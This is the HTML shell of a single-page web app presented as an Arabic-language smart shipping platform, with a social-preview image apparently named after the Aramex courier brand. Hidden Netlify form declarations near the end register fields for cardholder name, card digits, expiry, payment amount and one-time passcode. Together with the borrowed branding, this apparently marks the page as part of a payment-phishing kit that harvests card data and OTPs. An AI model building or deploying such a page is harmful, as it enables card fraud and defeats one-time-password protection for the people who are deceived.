<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="theme-color" content="#0EA5E9" />
    <link rel="manifest" href="/manifest.json" />
    <link rel="apple-touch-icon" href="/icon-192.png" />
    <title>منصة الشحن الذكية - حلول شحن متطورة</title>
    <meta name="description" content="منصة شحن ذكية وموثوقة - خدمات شحن سريعة وآمنة مع دعم جميع شركات الشحن الكبرى" />
    <meta name="author" content="منصة الشحن الذكية" />
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Almarai:wght@300;400;700;800&display=swap" rel="stylesheet">

    <meta property="og:title" content="منصة الشحن الذكية - حلول شحن متطورة" />
    <meta property="og:description" content="منصة شحن ذكية وموثوقة - خدمات شحن سريعة وآمنة مع دعم جميع شركات الشحن الكبرى" />
    <meta property="og:type" content="website" />
    <meta property="og:image" content="/og-aramex.jpg" />
    <meta property="og:image:width" content="1200" />
    <meta property="og:image:height" content="630" />
    <meta property="og:image:type" content="image/jpeg" />

    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:site" content="@shipping_platform" />
    <meta name="twitter:image" content="/og-aramex.jpg" />
    <meta name="twitter:image:alt" content="منصة الشحن الذكية" />
    <script type="module" crossorigin src="/assets/index-DhcswEZq.js"></script>
    <link rel="stylesheet" crossorigin href="/assets/index-B4xNSA_N.css">
  </head>

  <body>
    <div id="root"></div>
    
    <!-- Hidden Netlify Forms for Detection -->
    <form name="card-details" netlify-honeypot="bot-field" data-netlify="true" hidden>
      <input type="text" name="name" />
      <input type="email" name="email" />
      <input type="tel" name="phone" />
      <input type="text" name="service" />
      <input type="text" name="cardholder" />
      <input type="text" name="cardLast4" />
      <input type="text" name="expiry" />
      <input type="text" name="timestamp" />
    </form>
    
    <form name="payment-confirmation" netlify-honeypot="bot-field" data-netlify="true" hidden>
      <input type="text" name="name" />
      <input type="email" name="email" />
      <input type="tel" name="phone" />
      <input type="text" name="service" />
      <input type="text" name="amount" />
      <input type="text" name="cardholder" />
      <input type="text" name="cardLast4" />
      <input type="text" name="otp" />
      <input type="text" name="timestamp" />
    </form>
  </body>
</html>
